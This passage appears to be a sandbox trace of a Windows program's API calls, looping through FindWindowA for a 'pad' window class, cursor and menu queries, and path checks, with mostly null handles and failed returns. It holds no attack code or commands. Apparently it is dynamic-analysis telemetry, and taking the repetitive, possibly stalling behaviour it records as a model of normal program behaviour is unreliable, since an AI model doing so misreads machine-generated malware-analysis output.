lpWindowName=0x0) returned 0x0 [0176.316] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0176.316] GetMenu (hWnd=0x0) returned 0x0 [0176.317] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x352) returned -1 [0176.317] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0176.317] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0176.317] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0176.317] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0176.317] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0176.317] GetStockObject (i=6) returned 0x1b00018 [0176.317] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0176.317] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0176.317] PathFileExistsW (pszPath=0x0) returned 0 [0176.317] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0176.317] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=850, y=824)) returned 1 [0176.317] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0176.317] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0176.317] GetMenu (hWnd=0x0) returned 0x0 [0176.317] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x352) returned -1 [0176.317] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0176.317] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0176.317] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0176.317] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0176.317] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0176.317] GetStockObject (i=6) returned 0x1b00018 [0176.317] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0176.317] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0176.317] PathFileExistsW (pszPath=0x0) returned 0 [0176.317] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0176.317] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=850, y=824)) returned 1 [0176.317] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0176.317] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0176.317] GetMenu (hWnd=0x0) returned 0x0 [0176.317] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x350) returned -1 [0176.317] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0176.317] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0176.317] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0176.318] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0176.318] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0176.318] GetStockObject (i=6) returned 0x1b00018 [0176.318] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0176.318] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0176.318] PathFileExistsW (pszPath=0x0) returned 0 [0176.318] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0176.318] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=850, y=824)) returned 1 [0176.318] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0176.318] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0176.318] GetMenu (hWnd=0x0) returned 0x0 [0176.318] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x592) returned -1 [0176.318] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0176.318] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0176.318] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0176.318] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0176.318] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0176.318] GetStockObject (i=6) returned 0x1b00018 [0176.318] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0176.318] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0176.318] PathFileExistsW (pszPath=0x0) returned 0 [0176.318] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0176.318] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=850, y=824)) returned 1 [0176.318] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0176.318] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0176.318] GetMenu (hWnd=0x0) returned 0x0 [0176.318] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x352) returned -1 [0176.318] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0176.318] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0176.318] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0176.318] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0176.318] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0176.318] GetStockObject (i=6) returned 0x1b00018 [0176.318] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0176.319] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0176.319] PathFileExistsW (pszPath=0x0) returned 0 [0176.319] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0176.319] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=850, y=824)) returned 1 [0176.319] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0176.319] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0176.319] GetMenu (hWnd=0x0) returned 0x0 [0176.319] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x34f) returned -1 [0176.319] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0176.319] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0176.319] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0176.319] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0176.319] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0176.319] GetStockObject (i=6) returned 0x1b00018 [0176.319] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0176.319] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0176.319] PathFileExistsW (pszPath=0x0) returned 0 [0176.319] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0176.319] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=850, y=824)) returned 1 [0176.319] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0176.319] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0176.319] GetMenu (hWnd=0x0) returned 0x0 [0176.319] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x352) returned -1 [0176.319] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0176.319] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0176.319] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0176.319] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0176.319] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0176.319] GetStockObject (i=6) returned 0x1b00018 [0176.319] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0176.319] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0176.319] PathFileExistsW (pszPath=0x0) returned 0 [0176.319] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0176.319] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=850, y=824)) returned 1 [0176.319] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0176.320] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0176.320] GetMenu (hWnd=0x0) returned 0x0 [0176.320] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x350) returned -1 [0176.320] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0176.320] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0176.320] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0176.320] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0176.320] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0176.320] GetStockObject (i=6) returned 0x1b00018 [0176.320] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0176.320] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0176.320] PathFileExistsW (pszPath=0x0) returned 0 [0176.320] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0176.320] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=850, y=824)) returned 1 [0176.320] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0176.320] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0176.320] GetMenu (hWnd=0x0) returned 0x0 [0176.320] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x2bc) returned -1 [0176.320] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0176.320] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0176.320] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0176.320] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0176.320] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0176.320] GetStockObject (i=6) returned 0x1b00018 [0176.320] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0176.320] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0176.320] PathFileExistsW (pszPath=0x0) returned 0 [0176.320] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0176.320] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=850, y=824)) returned 1 [0176.320] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0176.320] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0176.320] GetMenu (hWnd=0x0) returned 0x0 [0176.320] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x352) returned -1 [0176.321] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0176.321] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0176.321] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0176.321] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0176.321] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0176.321] GetStockObject (i=6) returned 0x1b00018 [0176.321] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0176.321] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0176.321] PathFileExistsW (pszPath=0x0) returned 0 [0176.321] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0176.321] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=850, y=824)) returned 1 [0176.321] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0176.321] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0176.321] GetMenu (hWnd=0x0) returned 0x0 [0176.321] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x350) returned -1 [0176.321] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0176.321] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0176.321] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0176.321] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0176.321] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0176.321] GetStockObject (i=6) returned 0x1b00018 [0176.321] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0176.321] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0176.321] PathFileExistsW (pszPath=0x0) returned 0 [0176.321] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0176.321] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=850, y=824)) returned 1 [0176.321] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0176.321] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0176.321] GetMenu (hWnd=0x0) returned 0x0 [0176.321] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x352) returned -1 [0176.321] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0176.321] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0176.321] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0176.321] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0176.321] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0176.322] GetStockObject (i=6) returned 0x1b00018 [0176.322] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0176.322] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0176.322] PathFileExistsW (pszPath=0x0) returned 0 [0176.322] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0176.322] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=850, y=824)) returned 1 [0176.322] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0176.322] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0176.322] GetMenu (hWnd=0x0) returned 0x0 [0176.322] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x350) returned -1 [0176.322] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0176.322] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0176.322] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0176.322] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0176.322] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0176.322] GetStockObject (i=6) returned 0x1b00018 [0176.322] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0176.322] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0176.322] PathFileExistsW (pszPath=0x0) returned 0 [0176.322] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0176.322] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=850, y=824)) returned 1 [0176.322] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0176.322] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0176.322] GetMenu (hWnd=0x0) returned 0x0 [0176.322] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x49a) returned -1 [0176.322] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0176.322] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0176.322] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0176.322] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0176.322] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0176.322] GetStockObject (i=6) returned 0x1b00018 [0176.322] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0176.322] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0176.322] PathFileExistsW (pszPath=0x0) returned 0 [0176.322] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0176.323] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=850, y=824)) returned 1 [0176.323] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0176.323] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0176.323] GetMenu (hWnd=0x0) returned 0x0 [0176.323] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x352) returned -1 [0176.323] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0176.323] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0176.323] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0176.323] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0176.323] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0176.323] GetStockObject (i=6) returned 0x1b00018 [0176.323] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0176.323] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0176.323] PathFileExistsW (pszPath=0x0) returned 0 [0176.323] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0176.323] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=850, y=824)) returned 1 [0176.323] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0176.323] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0176.323] GetMenu (hWnd=0x0) returned 0x0 [0176.323] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x354) returned -1 [0176.323] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0176.323] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0176.323] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0176.323] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0176.323] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0176.323] GetStockObject (i=6) returned 0x1b00018 [0176.323] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0176.323] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0176.323] PathFileExistsW (pszPath=0x0) returned 0 [0176.323] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0176.323] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=850, y=824)) returned 1 [0176.323] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0176.323] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0176.323] GetMenu (hWnd=0x0) returned 0x0 [0176.324] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x352) returned -1 [0176.324] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0176.324] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0176.324] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0176.324] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0176.324] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0176.324] GetStockObject (i=6) returned 0x1b00018 [0176.324] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0176.324] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0176.324] PathFileExistsW (pszPath=0x0) returned 0 [0176.324] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0176.324] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=850, y=824)) returned 1 [0176.324] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0176.324] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0176.324] GetMenu (hWnd=0x0) returned 0x0 [0176.324] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x351) returned -1 [0176.324] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0176.324] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0176.324] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0176.324] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0176.324] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0176.324] GetStockObject (i=6) returned 0x1b00018 [0176.324] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0176.324] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0176.324] PathFileExistsW (pszPath=0x0) returned 0 [0176.324] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0176.324] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=850, y=824)) returned 1 [0176.324] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0176.324] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0176.324] GetMenu (hWnd=0x0) returned 0x0 [0176.324] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x38a) returned -1 [0176.324] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0176.324] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0176.325] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0176.325] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0176.325] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0176.325] GetStockObject (i=6) returned 0x1b00018 [0176.325] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0176.325] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0176.325] PathFileExistsW (pszPath=0x0) returned 0 [0176.325] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0176.325] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=850, y=824)) returned 1 [0176.325] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0176.325] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0176.325] GetMenu (hWnd=0x0) returned 0x0 [0176.325] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x352) returned -1 [0176.325] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0176.325] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0176.325] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0176.325] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0176.325] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0176.325] GetStockObject (i=6) returned 0x1b00018 [0176.325] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0176.325] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0176.325] PathFileExistsW (pszPath=0x0) returned 0 